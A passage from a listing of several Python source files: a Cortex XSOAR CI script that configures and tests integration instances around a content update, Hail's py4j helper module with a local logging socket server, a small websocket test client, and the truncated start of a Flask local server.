'enabled': "true",
'engine': '',
'id': '',
'isIntegrationScript': is_byoi,
'name': instance_name,
'passwordProtected': False,
'version': 0
}
# set server keys
__set_server_keys(client, integration_params, integration_configuration['name'])
# set module params
for param_conf in module_configuration:
configured_param = set_module_params(param_conf, integration_params)
module_instance['data'].append(configured_param)
return module_instance
def group_integrations(integrations, skipped_integrations_conf, new_integrations_names, modified_integrations_names):
"""
    Filter integrations into their respective lists - new, modified or unchanged. Integrations on the skip list
    are skipped. If random tests were chosen, we may be configuring integrations that are neither new nor modified.
Args:
integrations (list): The integrations to categorize.
skipped_integrations_conf (dict): Integrations that are on the skip list.
new_integrations_names (list): The names of new integrations.
modified_integrations_names (list): The names of modified integrations.
Returns:
(tuple): Lists of integrations objects as well as an Integration-to-Status dictionary useful for logs.
"""
new_integrations = []
modified_integrations = []
unchanged_integrations = []
integration_to_status = {}
for integration in integrations:
integration_name = integration.get('name', '')
if integration_name in skipped_integrations_conf.keys():
continue
if integration_name in new_integrations_names:
new_integrations.append(integration)
elif integration_name in modified_integrations_names:
modified_integrations.append(integration)
integration_to_status[integration_name] = 'Modified Integration'
else:
unchanged_integrations.append(integration)
integration_to_status[integration_name] = 'Unchanged Integration'
return new_integrations, modified_integrations, unchanged_integrations, integration_to_status
def get_integrations_for_test(test, skipped_integrations_conf):
"""Return a list of integration objects that are necessary for a test (excluding integrations on the skip list).
Args:
test (dict): Test dictionary from the conf.json file containing the playbookID, integrations and
instance names.
skipped_integrations_conf (dict): Skipped integrations dictionary with integration names as keys and
the skip reason as values.
Returns:
(list): List of integration objects to configure.
"""
integrations_conf = test.get('integrations', [])
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf]
integrations = [
{'name': integration, 'params': {}} for
integration in integrations_conf if integration not in skipped_integrations_conf
]
return integrations
def update_content_on_demisto_instance(client, server, ami_name):
"""Try to update the content
Args:
client (demisto_client): The configured client to use.
        server (str): The server url to pass to Tests/update_content_data.py
        ami_name (str): The AMI environment name of the server whose content is being updated.
"""
content_zip_path = 'artifacts/all_content.zip'
update_content(content_zip_path, server=server, client=client)
# Check if content update has finished installing
sleep_interval = 20
updating_content = is_content_update_in_progress(client)
while updating_content.lower() == 'true':
sleep(sleep_interval)
updating_content = is_content_update_in_progress(client)
if updating_content.lower() == 'request unsuccessful':
# since the request to check if content update installation finished didn't work, can't use that mechanism
# to check and just try sleeping for 30 seconds instead to allow for content update installation to complete
logging.debug('Request to install content was unsuccessful, sleeping for 30 seconds and retrying')
sleep(30)
else:
# check that the content installation updated
# verify the asset id matches the circleci build number / asset_id in the content-descriptor.json
release, asset_id = get_content_version_details(client, ami_name)
logging.info(f'Content Release Version: {release}')
with open('./artifacts/content-descriptor.json', 'r') as cd_file:
cd_json = json.loads(cd_file.read())
cd_release = cd_json.get('release')
cd_asset_id = cd_json.get('assetId')
if release == cd_release and asset_id == cd_asset_id:
logging.success(f'Content Update Successfully Installed on server {server}.')
else:
logging.error(
f'Content Update to version: {release} was Unsuccessful:\nAttempted to install content with release '
f'"{cd_release}" and assetId "{cd_asset_id}" but release "{release}" and assetId "{asset_id}" '
f'were retrieved from the instance post installation.')
if ami_name not in MARKET_PLACE_MACHINES:
sys.exit(1)
def report_tests_status(preupdate_fails, postupdate_fails, preupdate_success, postupdate_success,
new_integrations_names, build=None):
"""Prints errors and/or warnings if there are any and returns whether whether testing was successful or not.
Args:
preupdate_fails (set): List of tuples of integrations that failed the "Test" button prior to content
being updated on the demisto instance where each tuple is comprised of the integration name and the
name of the instance that was configured for that integration which failed.
postupdate_fails (set): List of tuples of integrations that failed the "Test" button after content was
updated on the demisto instance where each tuple is comprised of the integration name and the name
of the instance that was configured for that integration which failed.
        preupdate_success (set): List of tuples of integrations that succeeded the "Test" button prior to content
            being updated on the demisto instance where each tuple is comprised of the integration name and the
            name of the instance that was configured for that integration which succeeded.
        postupdate_success (set): List of tuples of integrations that succeeded the "Test" button after content was
            updated on the demisto instance where each tuple is comprised of the integration name and the name
            of the instance that was configured for that integration which succeeded.
new_integrations_names (list): List of the names of integrations that are new since the last official
content release and that will only be present on the demisto instance after the content update is
performed.
build: Build object
Returns:
(bool): False if there were integration instances that succeeded prior to the content update and then
failed after content was updated, otherwise True.
"""
testing_status = True
# a "Test" can be either successful both before and after content update(succeeded_pre_and_post variable),
# fail on one of them(mismatched_statuses variable), or on both(failed_pre_and_post variable)
succeeded_pre_and_post = preupdate_success.intersection(postupdate_success)
if succeeded_pre_and_post:
succeeded_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in succeeded_pre_and_post])
logging.success(
'Integration instances that had ("Test" Button) succeeded both before and after the content update:\n'
f'{succeeded_pre_and_post_string}')
failed_pre_and_post = preupdate_fails.intersection(postupdate_fails)
mismatched_statuses = postupdate_fails - preupdate_fails
failed_only_after_update = []
failed_but_is_new = []
for instance_name, integration_of_instance in mismatched_statuses:
if integration_of_instance in new_integrations_names:
failed_but_is_new.append((instance_name, integration_of_instance))
else:
failed_only_after_update.append((instance_name, integration_of_instance))
# warnings but won't fail the build step
if failed_but_is_new:
failed_but_is_new_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_but_is_new])
logging.warning(f'New Integrations ("Test" Button) Failures:\n{failed_but_is_new_string}')
if failed_pre_and_post:
failed_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_pre_and_post])
logging.warning(f'Integration instances that had ("Test" Button) failures '
f'both before and after the content update:\n{pformat(failed_pre_and_post_string)}')
# fail the step if there are instances that only failed after content was updated
if failed_only_after_update:
failed_only_after_update_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in failed_only_after_update])
testing_status = False
logging.critical('Integration instances that had ("Test" Button) failures only after content was updated:\n'
f'{pformat(failed_only_after_update_string)}.\n'
f'This indicates that your updates introduced breaking changes to the integration.')
else:
        # create this file to indicate that this instance passed the post-update tests
if build:
with open("./Tests/is_post_update_passed_{}.txt".format(build.ami_env.replace(' ', '')), 'a'):
pass
return testing_status
def get_env_conf():
if Build.run_environment == Running.CI_RUN:
return get_json_file(Build.env_results_path)
if Build.run_environment == Running.WITH_LOCAL_SERVER:
# START CHANGE ON LOCAL RUN #
return [{
"InstanceDNS": "http://localhost:8080",
"Role": "Server Master" # e.g. 'Server Master'
}]
if Build.run_environment == Running.WITH_OTHER_SERVER:
return [{
"InstanceDNS": "DNS NANE", # without http prefix
"Role": "DEMISTO EVN" # e.g. 'Server Master'
}]
# END CHANGE ON LOCAL RUN #
return None
def map_server_to_port(env_results, instance_role):
"""
Arguments:
env_results: (dict)
env_results.json in server
instance_role: (str)
The amazon machine image environment whose IP we should connect to.
Returns:
        (dict): A mapping from each matching server's DNS name to its tunnel port
"""
ip_to_port_map = {env.get('InstanceDNS'): env.get('TunnelPort') for env in env_results if
instance_role in env.get('Role', '')}
return ip_to_port_map
def get_json_file(path):
with open(path, 'r') as json_file:
return json.loads(json_file.read())
def configure_servers_and_restart(build):
manual_restart = Build.run_environment == Running.WITH_LOCAL_SERVER
for server in build.servers:
configurations = dict()
configure_types = []
if is_redhat_instance(server.internal_ip):
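            # RedHat instances use the podman-specific hardening configuration plus an explicit slirp4netns network CIDR.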
configurations.update(DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN)
configurations.update(NO_PROXY_CONFIG)
configurations['python.pass.extra.keys'] += "##--network=slirp4netns:cidr=192.168.0.0/16"
else:
configurations.update(DOCKER_HARDENING_CONFIGURATION)
configure_types.append('docker hardening')
configure_types.append('marketplace')
configurations.update(MARKET_PLACE_CONFIGURATION)
error_msg = 'failed to set {} configurations'.format(' and '.join(configure_types))
server.add_server_configuration(configurations, error_msg=error_msg, restart=not manual_restart)
if manual_restart:
input('restart your server and then press enter.')
else:
logging.info('Done restarting servers. Sleeping for 1 minute')
sleep(60)
def get_tests(build: Build) -> List[dict]:
"""
    Selects the tests that should be run in this execution and filters out those that cannot run on this server version
Args:
build: Build object
Returns:
Test configurations from conf.json that should be run in this execution
"""
server_numeric_version: str = build.server_numeric_version
tests: dict = build.tests
if Build.run_environment == Running.CI_RUN:
filtered_tests = BuildContext._extract_filtered_tests()
if build.is_nightly:
# skip test button testing
logging.debug('Not running instance tests in nightly flow')
tests_for_iteration = []
else:
tests_for_iteration = [test for test in tests
if not filtered_tests or test.get('playbookID', '') in filtered_tests]
tests_for_iteration = filter_tests_with_incompatible_version(tests_for_iteration, server_numeric_version)
return tests_for_iteration
# START CHANGE ON LOCAL RUN #
return [
{
"playbookID": "Docker Hardening Test",
"fromversion": "5.0.0"
},
{
"integrations": "SplunkPy",
"playbookID": "SplunkPy-Test-V2",
"memory_threshold": 500,
"instance_names": "use_default_handler"
}
]
# END CHANGE ON LOCAL RUN #
def get_changed_integrations(build: Build) -> tuple:
"""
Return 2 lists - list of new integrations and list of modified integrations since the commit of the git_sha1.
Args:
build: the build object
Returns:
list of new integrations and list of modified integrations
"""
new_integrations_files, modified_integrations_files = get_new_and_modified_integration_files(
build.branch_name) if not build.is_private else ([], [])
new_integrations_names, modified_integrations_names = [], []
if new_integrations_files:
new_integrations_names = get_integration_names_from_files(new_integrations_files)
logging.debug(f'New Integrations Since Last Release:\n{new_integrations_names}')
if modified_integrations_files:
modified_integrations_names = get_integration_names_from_files(modified_integrations_files)
logging.debug(f'Updated Integrations Since Last Release:\n{modified_integrations_names}')
return new_integrations_names, modified_integrations_names
def nightly_install_packs(build, install_method=None, pack_path=None, service_account=None):
threads_list = []
if not install_method:
raise Exception('Install method was not provided.')
    # For each server url we install the pack(s)
for server in build.servers:
kwargs = {'client': server.client, 'host': server.internal_ip}
if service_account:
kwargs['service_account'] = service_account
if pack_path:
kwargs['pack_path'] = pack_path
threads_list.append(Thread(target=install_method, kwargs=kwargs))
run_threads_list(threads_list)
def install_nightly_pack(build):
nightly_install_packs(build, install_method=install_all_content_packs_for_nightly,
service_account=build.service_account)
create_nightly_test_pack()
nightly_install_packs(build, install_method=upload_zipped_packs,
pack_path=f'{Build.test_pack_target}/test_pack.zip')
logging.info('Sleeping for 45 seconds while installing nightly packs')
sleep(45)
def install_packs(build, pack_ids=None):
pack_ids = build.pack_ids_to_install if pack_ids is None else pack_ids
installed_content_packs_successfully = True
for server in build.servers:
try:
_, flag = search_and_install_packs_and_their_dependencies(pack_ids, server.client)
if not flag:
raise Exception('Failed to search and install packs.')
except Exception:
logging.exception('Failed to search and install packs')
installed_content_packs_successfully = False
return installed_content_packs_successfully
def configure_server_instances(build: Build, tests_for_iteration, all_new_integrations, modified_integrations):
modified_module_instances = []
new_module_instances = []
testing_client = build.servers[0].client
for test in tests_for_iteration:
integrations = get_integrations_for_test(test, build.skipped_integrations_conf)
playbook_id = test.get('playbookID')
new_integrations, modified_integrations, unchanged_integrations, integration_to_status = group_integrations(
integrations, build.skipped_integrations_conf, all_new_integrations, modified_integrations
)
integration_to_status_string = '\n\t\t\t\t\t\t'.join(
[f'"{key}" - {val}' for key, val in integration_to_status.items()])
if integration_to_status_string:
logging.info(f'All Integrations for test "{playbook_id}":\n\t\t\t\t\t\t{integration_to_status_string}')
else:
logging.info(f'No Integrations for test "{playbook_id}"')
instance_names_conf = test.get('instance_names', [])
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf]
integrations_to_configure = modified_integrations[:]
integrations_to_configure.extend(unchanged_integrations)
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
new_ints_params_set = set_integration_params(build,
new_integrations,
build.secret_conf['integrations'],
instance_names_conf,
placeholders_map)
ints_to_configure_params_set = set_integration_params(build,
integrations_to_configure,
build.secret_conf['integrations'],
instance_names_conf, placeholders_map)
if not new_ints_params_set:
logging.error(f'failed setting parameters for integrations: {new_integrations}')
if not ints_to_configure_params_set:
logging.error(f'failed setting parameters for integrations: {integrations_to_configure}')
if not (new_ints_params_set and ints_to_configure_params_set):
continue
modified_module_instances_for_test, new_module_instances_for_test = configure_modified_and_new_integrations(
build,
integrations_to_configure,
new_integrations,
testing_client)
modified_module_instances.extend(modified_module_instances_for_test)
new_module_instances.extend(new_module_instances_for_test)
return modified_module_instances, new_module_instances
def configure_modified_and_new_integrations(build: Build,
modified_integrations_to_configure: list,
new_integrations_to_configure: list,
demisto_client_: demisto_client) -> tuple:
"""
Configures old and new integrations in the server configured in the demisto_client.
Args:
build: The build object
        modified_integrations_to_configure: Integrations to configure that already exist
        new_integrations_to_configure: Integrations to configure that were created in this build
        demisto_client_: A demisto client
Returns:
A tuple with two lists:
1. List of configured instances of modified integrations
2. List of configured instances of new integrations
"""
modified_modules_instances = []
new_modules_instances = []
for integration in modified_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client_, placeholders_map)
if module_instance:
modified_modules_instances.append(module_instance)
for integration in new_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client_, placeholders_map)
if module_instance:
new_modules_instances.append(module_instance)
return modified_modules_instances, new_modules_instances
def instance_testing(build: Build,
all_module_instances: list,
pre_update: bool,
use_mock: bool = True,
first_call: bool = True) -> Tuple[set, set]:
"""
Runs 'test-module' command for the instances detailed in `all_module_instances`
Args:
build: An object containing the current build info.
all_module_instances: The integration instances that should be tested
pre_update: Whether this instance testing is before or after the content update on the server.
        use_mock: Whether to use a mock while testing mockable integrations. Set this to False mainly for
            private content builds, which don't use the mocks.
        first_call: indicates if it's the first time the function is called from the same place
Returns:
A set of the successful tests containing the instance name and the integration name
A set of the failed tests containing the instance name and the integration name
"""
update_status = 'Pre' if pre_update else 'Post'
failed_tests = set()
successful_tests = set()
# Test all module instances (of modified + unchanged integrations) pre-updating content
if all_module_instances:
# only print start message if there are instances to configure
logging.info(f'Start of Instance Testing ("Test" button) ({update_status}-update)')
else:
logging.info(f'No integrations to configure for the chosen tests. ({update_status}-update)')
failed_instances = []
for instance in all_module_instances:
integration_of_instance = instance.get('brand', '')
instance_name = instance.get('name', '')
# If there is a failure, __test_integration_instance will print it
if integration_of_instance not in build.unmockable_integrations and use_mock:
success = test_integration_with_mock(build, instance, pre_update)
else:
testing_client = build.servers[0].reconnect_client()
success, _ = __test_integration_instance(testing_client, instance)
if not success:
failed_tests.add((instance_name, integration_of_instance))
failed_instances.append(instance)
else:
successful_tests.add((instance_name, integration_of_instance))
    # in case some tests failed post-update, wait 15 seconds, then run the failed tests again
if failed_instances and not pre_update and first_call:
logging.info("some post-update tests failed, sleeping for 15 seconds, then running the failed tests again")
sleep(15)
_, failed_tests = instance_testing(build, failed_instances, pre_update=False, first_call=False)
return successful_tests, failed_tests
def test_integration_with_mock(build: Build, instance: dict, pre_update: bool):
"""
Runs 'test-module' for given integration with mitmproxy
In case the playback mode fails and this is a pre-update run - a record attempt will be executed.
Args:
build: An object containing the current build info.
instance: A dict containing the instance details
pre_update: Whether this instance testing is before or after the content update on the server.
Returns:
The result of running the 'test-module' command for the given integration.
        If a record was executed - will return the result of the 'test-module' run in record mode only.
"""
testing_client = build.servers[0].reconnect_client()
integration_of_instance = instance.get('brand', '')
logging.debug(f'Integration "{integration_of_instance}" is mockable, running test-module with mitmproxy')
has_mock_file = build.proxy.has_mock_file(integration_of_instance)
success = False
if has_mock_file:
with run_with_mock(build.proxy, integration_of_instance) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.warning(f'Running test-module for "{integration_of_instance}" has failed in playback mode')
if not success and not pre_update:
logging.debug(f'Recording a mock file for integration "{integration_of_instance}".')
with run_with_mock(build.proxy, integration_of_instance, record=True) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.debug(f'Record mode for integration "{integration_of_instance}" has failed.')
return success
def update_content_till_v6(build: Build):
threads_list = []
# For each server url we install content
for server in build.servers:
t = Thread(target=update_content_on_demisto_instance,
kwargs={'client': server.client, 'server': server.internal_ip, 'ami_name': build.ami_env})
threads_list.append(t)
run_threads_list(threads_list)
def disable_instances(build: Build):
for server in build.servers:
disable_all_integrations(server.client)
def create_nightly_test_pack():
test_pack_zip(Build.content_path, Build.test_pack_target)
def test_files(content_path):
packs_root = f'{content_path}/Packs'
packs = filter(lambda x: x.is_dir(), os.scandir(packs_root))
for pack_dir in packs:
if pack_dir in SKIPPED_PACKS:
continue
playbooks_root = f'{pack_dir.path}/TestPlaybooks'
if os.path.isdir(playbooks_root):
for playbook_path, playbook in get_test_playbooks_in_dir(playbooks_root):
yield playbook_path, playbook
if os.path.isdir(f'{playbooks_root}/NonCircleTests'):
for playbook_path, playbook in get_test_playbooks_in_dir(f'{playbooks_root}/NonCircleTests'):
yield playbook_path, playbook
def get_test_playbooks_in_dir(path):
playbooks = filter(lambda x: x.is_file(), os.scandir(path))
for playbook in playbooks:
yield playbook.path, playbook
def test_pack_metadata():
now = datetime.now().isoformat().split('.')[0]
now = f'{now}Z'
metadata = {
"name": "nightly test",
"id": str(uuid.uuid4()),
"description": "nightly test pack (all test playbooks and scripts).",
"created": now,
"updated": now,
"legacy": True,
"support": "Cortex XSOAR",
"supportDetails": {},
"author": "Cortex XSOAR",
"authorImage": "",
"certification": "certified",
"price": 0,
"serverMinVersion": "6.0.0",
"serverLicense": "",
"currentVersion": "1.0.0",
"general": [],
"tags": [],
"categories": [
"Forensics & Malware Analysis"
],
"contentItems": {},
"integrations": [],
"useCases": [],
"keywords": [],
"dependencies": {}
}
return json.dumps(metadata, indent=4)
def test_pack_zip(content_path, target):
with zipfile.ZipFile(f'{target}/test_pack.zip', 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr('test_pack/metadata.json', test_pack_metadata())
for test_path, test in test_files(content_path):
if not test_path.endswith('.yml'):
continue
test = test.name
with open(test_path, 'r') as test_file:
if not (test.startswith('playbook-') or test.startswith('script-')):
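                    # Derive the content type from the YAML so the file gets a proper prefix; rewind afterwards since safe_load consumed the stream.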
test_type = find_type(_dict=yaml.safe_load(test_file), file_type='yml').value
test_file.seek(0)
test_target = f'test_pack/TestPlaybooks/{test_type}-{test}'
else:
test_target = f'test_pack/TestPlaybooks/{test}'
zip_file.writestr(test_target, test_file.read())
def get_non_added_packs_ids(build: Build):
"""
:param build: the build object
    :return: all non-added packs, i.e. unchanged packs (dependencies) and modified packs
"""
compare_against = 'origin/master{}'.format('' if not build.branch_name == 'master' else '~1')
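    # When the build branch is master itself, diff against master~1 so the latest commit's added packs are still detected.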
added_files = run_command(f'git diff --name-only --diff-filter=A '
f'{compare_against}..refs/heads/{build.branch_name} -- Packs/*/pack_metadata.json')
if os.getenv('CONTRIB_BRANCH'):
added_contrib_files = run_command(
'git status -uall --porcelain -- Packs/*/pack_metadata.json | grep "?? "').replace('?? ', '')
added_files = added_files if not added_contrib_files else '\n'.join([added_files, added_contrib_files])
added_files = filter(lambda x: x, added_files.split('\n'))
added_pack_ids = map(lambda x: x.split('/')[1], added_files)
return set(build.pack_ids_to_install) - set(added_pack_ids)
def set_marketplace_url(servers, branch_name, ci_build_number):
url_suffix = quote_plus(f'{branch_name}/{ci_build_number}/xsoar')
config_path = 'marketplace.bootstrap.bypass.url'
config = {config_path: f'https://storage.googleapis.com/marketplace-ci-build/content/builds/{url_suffix}'}
for server in servers:
server.add_server_configuration(config, 'failed to configure marketplace custom url ', True)
logging.success('Updated marketplace url and restarted servers')
logging.info('sleeping for 60 seconds')
sleep(60)
@run_with_proxy_configured
def test_integrations_post_update(build: Build, new_module_instances: list, modified_module_instances: list) -> tuple:
"""
    Runs 'test-module' on all integrations for the post-update check
Args:
build: A build object
new_module_instances: A list containing new integrations instances to run test-module on
modified_module_instances: A list containing old (existing) integrations instances to run test-module on
Returns:
* A list of integration names that have failed the 'test-module' execution post update
* A list of integration names that have succeeded the 'test-module' execution post update
"""
modified_module_instances.extend(new_module_instances)
successful_tests_post, failed_tests_post = instance_testing(build, modified_module_instances, pre_update=False)
return successful_tests_post, failed_tests_post
def update_content_on_servers(build: Build) -> bool:
"""
Updates content on the build's server according to the server version
Args:
build: Build object
Returns:
A boolean that indicates whether the content installation was successful.
        If the server version is lower than 6.0 - will return the 'installed_content_packs_successfully' parameter as is.
        If the server version is higher than or equal to 6.0 - will return True if the packs installation was successful
        both before and after the update.
"""
installed_content_packs_successfully = True
if LooseVersion(build.server_numeric_version) < LooseVersion('6.0.0'):
update_content_till_v6(build)
elif not build.is_nightly:
set_marketplace_url(build.servers, build.branch_name, build.ci_build_number)
installed_content_packs_successfully = install_packs(build)
return installed_content_packs_successfully
@run_with_proxy_configured
def configure_and_test_integrations_pre_update(build: Build, new_integrations, modified_integrations) -> tuple:
"""
Configures integration instances that exist in the current version and for each integration runs 'test-module'.
Args:
build: Build object
new_integrations: A list containing new integrations names
modified_integrations: A list containing modified integrations names
Returns:
A tuple consists of:
* A list of modified module instances configured
* A list of new module instances configured
* A list of integrations that have failed the 'test-module' command execution
* A list of integrations that have succeeded the 'test-module' command execution
* A list of new integrations names
"""
tests_for_iteration = get_tests(build)
modified_module_instances, new_module_instances = configure_server_instances(build,
tests_for_iteration,
new_integrations,
modified_integrations)
successful_tests_pre, failed_tests_pre = instance_testing(build, modified_module_instances, pre_update=True)
return modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre
def install_packs_pre_update(build: Build) -> bool:
"""
Install packs on server according to server version
Args:
build: A build object
Returns:
A boolean that indicates whether the installation was successful or not
"""
installed_content_packs_successfully = False
if LooseVersion(build.server_numeric_version) >= LooseVersion('6.0.0'):
if build.is_nightly:
install_nightly_pack(build)
installed_content_packs_successfully = True
else:
if not build.is_private:
pack_ids = get_non_added_packs_ids(build)
installed_content_packs_successfully = install_packs(build, pack_ids=pack_ids)
else:
installed_content_packs_successfully = True
return installed_content_packs_successfully
def main():
install_logging('Install_Content_And_Configure_Integrations_On_Server.log', logger=logging)
build = Build(options_handler())
logging.info(f"Build Number: {build.ci_build_number}")
configure_servers_and_restart(build)
disable_instances(build)
install_packs_pre_update(build)
new_integrations, modified_integrations = get_changed_integrations(build)
pre_update_configuration_results = configure_and_test_integrations_pre_update(build,
new_integrations,
modified_integrations)
modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre = pre_update_configuration_results
installed_content_packs_successfully = update_content_on_servers(build)
successful_tests_post, failed_tests_post = test_integrations_post_update(build,
new_module_instances,
modified_module_instances)
success = report_tests_status(failed_tests_pre, failed_tests_post, successful_tests_pre, successful_tests_post,
new_integrations, build)
if not success or not installed_content_packs_successfully:
sys.exit(2)
if __name__ == '__main__':
main()
|
java.py
|
import json
import socketserver
import socket
import sys
import re
from threading import Thread
import py4j
import hail
class FatalError(Exception):
""":class:`.FatalError` is an error thrown by Hail method failures"""
class Env:
_jvm = None
_gateway = None
_hail_package = None
_jutils = None
_hc = None
_counter = 0
_seed_generator = None
@staticmethod
def get_uid():
Env._counter += 1
return "__uid_{}".format(Env._counter)
@staticmethod
def jvm():
if not Env._jvm:
Env.hc()
assert Env._jvm is not None
return Env._jvm
@staticmethod
def hail():
if not Env._hail_package:
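            # 'is' is a Python keyword, so the JVM's is.hail package has to be reached via getattr.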
Env._hail_package = getattr(Env.jvm(), 'is').hail
return Env._hail_package
@staticmethod
def gateway():
if not Env._gateway:
Env.hc()
assert Env._gateway is not None
return Env._gateway
@staticmethod
def jutils():
if not Env._jutils:
Env._jutils = scala_package_object(Env.hail().utils)
return Env._jutils
@staticmethod
def hc():
if not Env._hc:
from hail.context import init
import sys
sys.stderr.write("Initializing Spark and Hail with default parameters...\n")
init()
assert Env._hc is not None
return Env._hc
@staticmethod
def backend():
return Env.hc()._backend
@staticmethod
def spark_backend(op):
b = Env.backend()
if isinstance(b, hail.backend.SparkBackend):
return b
else:
raise NotImplementedError(
f"{b.__class__.__name__} doesn't support {op}, only SparkBackend")
@staticmethod
def fs():
return Env.backend().fs
@staticmethod
def spark_session():
return Env.hc()._spark_session
_dummy_table = None
@staticmethod
def dummy_table():
if Env._dummy_table is None:
import hail
Env._dummy_table = hail.utils.range_table(1, 1).key_by().cache()
return Env._dummy_table
@staticmethod
def set_seed(seed):
Env._seed_generator = hail.utils.HailSeedGenerator(seed)
@staticmethod
def next_seed():
if Env._seed_generator is None:
Env.set_seed(None)
return Env._seed_generator.next_seed()
def jarray(jtype, lst):
jarr = Env.gateway().new_array(jtype, len(lst))
for i, s in enumerate(lst):
jarr[i] = s
return jarr
def scala_object(jpackage, name):
return getattr(getattr(jpackage, name + '$'), 'MODULE$')
def scala_package_object(jpackage):
return scala_object(jpackage, 'package')
def jnone():
return scala_object(Env.jvm().scala, 'None')
def jsome(x):
return Env.jvm().scala.Some(x)
def joption(x):
return jsome(x) if x else jnone()
def from_option(x):
return x.get() if x.isDefined() else None
def jindexed_seq(x):
return Env.jutils().arrayListToISeq(x)
def jset(x):
return Env.jutils().arrayListToSet(x)
def jindexed_seq_args(x):
args = [x] if isinstance(x, str) else x
return jindexed_seq(args)
def jset_args(x):
args = [x] if isinstance(x, str) else x
return jset(args)
def jiterable_to_list(it):
if it is not None:
return list(Env.jutils().iterableToArrayList(it))
else:
return None
def dump_json(obj):
return f'"{escape_str(json.dumps(obj))}"'
def escape_str(s):
return Env.jutils().escapePyString(s)
def parsable_strings(strs):
strs = ' '.join(f'"{escape_str(s)}"' for s in strs)
return f"({strs})"
_parsable_str = re.compile(r'[\w_]+')
def escape_parsable(s):
if _parsable_str.fullmatch(s):
return s
else:
return '`' + s.encode('unicode_escape').decode('utf-8').replace('`', '\\`') + '`'
def unescape_parsable(s):
return bytes(s.replace('\\`', '`'), 'utf-8').decode('unicode_escape')
def escape_id(s):
if re.fullmatch(r'[_a-zA-Z]\w*', s):
return s
else:
return Env.jutils().escapeIdentifier(s)
def jarray_to_list(a):
return list(a) if a else None
class Log4jLogger:
log_pkg = None
@staticmethod
def get():
if Log4jLogger.log_pkg is None:
Log4jLogger.log_pkg = Env.jutils()
return Log4jLogger.log_pkg
def error(msg):
Log4jLogger.get().error(msg)
def warn(msg):
Log4jLogger.get().warn(msg)
def info(msg):
Log4jLogger.get().info(msg)
def handle_java_exception(f):
def deco(*args, **kwargs):
import pyspark
try:
return f(*args, **kwargs)
except py4j.protocol.Py4JJavaError as e:
s = e.java_exception.toString()
# py4j catches NoSuchElementExceptions to stop array iteration
if s.startswith('java.util.NoSuchElementException'):
raise
tpl = Env.jutils().handleForPython(e.java_exception)
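            # The returned pair holds the deepest (summary) error message and the full Java stack trace.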
deepest, full = tpl._1(), tpl._2()
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (deepest, full, hail.__version__, deepest)) from None
except pyspark.sql.utils.CapturedException as e:
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (e.desc, e.stackTrace, hail.__version__, e.desc)) from None
return deco
_installed = False
_original = None
def install_exception_handler():
global _installed
global _original
if not _installed:
_original = py4j.protocol.get_return_value
_installed = True
# The original `get_return_value` is not patched, it's idempotent.
patched = handle_java_exception(_original)
# only patch the one used in py4j.java_gateway (call Java API)
py4j.java_gateway.get_return_value = patched
def uninstall_exception_handler():
global _installed
global _original
if _installed:
_installed = False
py4j.protocol.get_return_value = _original
class LoggingTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
for line in self.rfile:
sys.stderr.write(line.decode("ISO-8859-1"))
class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
def connect_logger(host, port):
"""
This method starts a simple server which listens on a port for a
client to connect and start writing messages. Whenever a message
is received, it is written to sys.stderr. The server is run in
a daemon thread from the caller, which is killed when the caller
thread dies.
If the socket is in use, then the server tries to listen on the
next port (port + 1). After 25 tries, it gives up.
:param str host: Hostname for server.
:param int port: Port to listen on.
"""
server = None
tries = 0
max_tries = 25
while not server:
try:
server = SimpleServer((host, port), LoggingTCPHandler)
except socket.error:
port += 1
tries += 1
if tries >= max_tries:
sys.stderr.write(
'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries))
return
t = Thread(target=server.serve_forever, args=())
# The thread should be a daemon so that it shuts down when the parent thread is killed
t.daemon = True
t.start()
Env.jutils().addSocketAppender(host, port)
|
testWordSending.py
|
import websocket
import time
import threading
try:
import thread
except ImportError:
import _thread as thread
num = 10
msg = ""
def worker():
global msg
global num
if msg == "end":
print("")
time.sleep(8)
else:
print(num)
ws.send(str(num))
num += 1
time.sleep(8)
def schedule(interval, wait=True):
base_time = time.time()
next_time = 0
while True:
t = threading.Thread(target=worker)
t.start()
# print(msg)
if wait:
t.join()
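        # Sleep until the next interval boundary measured from base_time (avoids drift); use a full interval if exactly on a boundary.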
next_time = ((base_time - time.time()) % interval) or interval
time.sleep(next_time)
# When the websocket connection is in an error state
def main():
schedule(1, False)
def on_message(ws, message):
global msg
msg = message
# print(msg)
def on_error(ws, error):
print(error)
# When the websocket connection is closed
def on_close(ws):
print("### closed ###")
# While the websocket connection is open
def on_open(ws):
def run(*args):
main()
ws.close()
print("thread terminating...")
thread.start_new_thread(run, ())
if __name__ == '__main__':
websocket.enableTrace(True)
ws = websocket.WebSocketApp("ws://127.0.0.1:5000",
on_error=on_error,
on_close=on_close,
on_message=on_message)
ws.on_open = on_open
ws.run_forever()
# execution()
|
local_server.py
|
import os.path
import threading
from flask import Flask
from code_runner import CodeRunner
from config import INDEX_HTML_PATH, FLASK_PORT
server = Flask(__name__)
def start():
